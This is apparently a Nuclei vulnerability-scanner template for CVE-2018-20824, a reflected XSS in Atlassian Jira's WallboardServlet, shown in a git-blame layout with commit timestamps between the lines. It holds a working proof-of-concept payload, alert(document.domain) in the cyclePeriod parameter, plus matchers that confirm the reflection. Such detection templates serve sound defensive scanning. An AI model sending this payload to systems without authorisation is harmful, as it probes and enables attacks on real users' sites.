2020-06-22 13:35:37 +00:00
|
|
|
id: CVE-2018-20824
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Atlassian Jira WallboardServlet XSS
|
2020-07-08 20:45:08 +00:00
|
|
|
author: madrobot & dwisiswant0
|
2020-06-22 13:35:37 +00:00
|
|
|
severity: medium
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-06-22 13:35:37 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
2020-06-22 21:51:54 +00:00
|
|
|
- 200
|
2020-07-08 20:45:08 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- (?mi)timeout:\salert\(document\.domain\)
|
2020-06-22 13:35:37 +00:00
|
|
|
part: body
|